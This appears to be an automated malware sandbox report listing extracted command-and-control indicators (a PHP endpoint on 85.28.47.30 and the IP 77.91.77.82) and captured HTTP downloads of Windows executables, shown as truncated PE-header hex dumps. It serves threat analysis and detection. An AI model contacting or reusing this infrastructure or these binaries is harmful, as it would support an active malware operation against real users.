                        Source: Malware configuration extractorURLs: http://85.28.47.30/920475a59bac849d.php
                        Source: Malware configuration extractorURLs: http://85.28.47.30/920475a59bac849d.php
                        Source: Malware configuration extractorIPs: 77.91.77.82
                        Source: Malware configuration extractorIPs: 77.91.77.82
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 05 Jul 2024 02:23:05 GMTContent-Type: application/octet-streamContent-Length: 2544640Last-Modified: Thu, 04 Jul 2024 23:59:33 GMTConnection: keep-aliveETag: "66873765-26d400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c8 e6 86 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 94 1a c0 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 c0 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 c0 9d 00 87 0d 00 00 a8 cd 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 d0 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 a0 22 00 00 90 9d 00 00 a0 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:23:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:23:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:23:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:23:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:23:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:23:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
